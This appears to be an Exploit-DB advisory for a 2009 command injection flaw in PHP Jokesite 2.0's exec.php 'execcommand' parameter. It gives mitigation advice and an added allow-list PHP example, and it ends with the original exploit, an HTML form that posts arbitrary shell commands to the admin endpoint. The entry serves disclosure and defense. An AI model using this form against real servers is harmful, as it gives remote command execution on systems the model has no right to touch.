Vendor: PHP Jokesite V 2.0
Author: indoushka
CVSS: 9.3 (HIGH)
Vulnerability Type: Command Injection
CWE: 78
Product Name: PHP Jokesite V 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:php_jokesite:php_jokesite_v2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
Year: 2009

PHP Jokesite V 2.0 exec command Exploit

A command injection vulnerability exists in PHP Jokesite V 2.0, which allows an attacker to execute arbitrary commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'execcommand' parameter of the 'exec.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This may allow the attacker to execute arbitrary commands on the vulnerable system with the privileges of the web server process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application. Additionally, the application should be configured to use the least privileged account with the minimal set of privileges necessary to perform its intended function.
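
The following is an added example, not PHP Jokesite code and not part of the original advisory: one way to apply the input validation and least-privilege advice above to an admin "run command" handler. It assumes PHP 7.4 or later on a Linux host, an existing admin login that sets $_SESSION['is_admin'] and $_SESSION['csrf'], and a new 'task' parameter; those names, the task list and the file paths are all hypothetical.

```php
<?php
// Added example, not PHP Jokesite code. Assumes PHP >= 7.4 and an admin login
// that sets $_SESSION['is_admin'] and $_SESSION['csrf'] (hypothetical names).
declare(strict_types=1);
session_start();

// Allow-list: the request carries only a task key. The argv arrays are fixed
// server-side (constructed sample tasks), so no request data reaches a command line.
const ALLOWED_TASKS = [
    'php_version' => ['/usr/bin/php', '-v'],
    'disk_usage'  => ['/usr/bin/du', '-sh', '/var/www/php-jokesite_v2'],
];

function run_task(string $key): array
{
    if (!array_key_exists($key, ALLOWED_TASKS)) {
        throw new InvalidArgumentException('unknown task');
    }
    // Array form of proc_open() starts the program directly, without a shell,
    // so shell metacharacters have no special meaning.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(ALLOWED_TASKS[$key], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start task');
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return ['exit' => proc_close($proc), 'output' => (string) $output];
}

$token = $_POST['csrf'] ?? '';
$task  = $_POST['task'] ?? '';
$csrf  = $_SESSION['csrf'] ?? '';
$authorized = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && !empty($_SESSION['is_admin'])
    && is_string($token) && is_string($task)
    && is_string($csrf) && $csrf !== '' && hash_equals($csrf, $token);
if (!$authorized) {
    http_response_code(403);   // reject before any process is started
    exit('Forbidden');
}
try {
    $result = run_task($task);
    header('Content-Type: text/plain; charset=utf-8');
    echo "exit={$result['exit']}\n", $result['output'];
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'Unknown task';
}
```

Running the PHP worker under a dedicated account that can read only the application directory limits what even an allow-listed task can touch.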

Exploit-DB raw data:

========================================================================================                  
| # Title    : PHP Jokesite V 2.0 exec command EXploit            
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                                  
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug      : execcommand                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
<form action="http://127.0.0.1/php-jokesite_v2/admin/setup/exec.php" method="post">
<input type="hidden" name="action" value="exec">

<table align="center">

<tr>

<td>Enter command to exec:</td>
</tr>

<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
</textarea>
</td>

</tr>
<tr>
<td><input type="submit" name="go" value="Go">
</td>

</tr>

</table>

</form>
 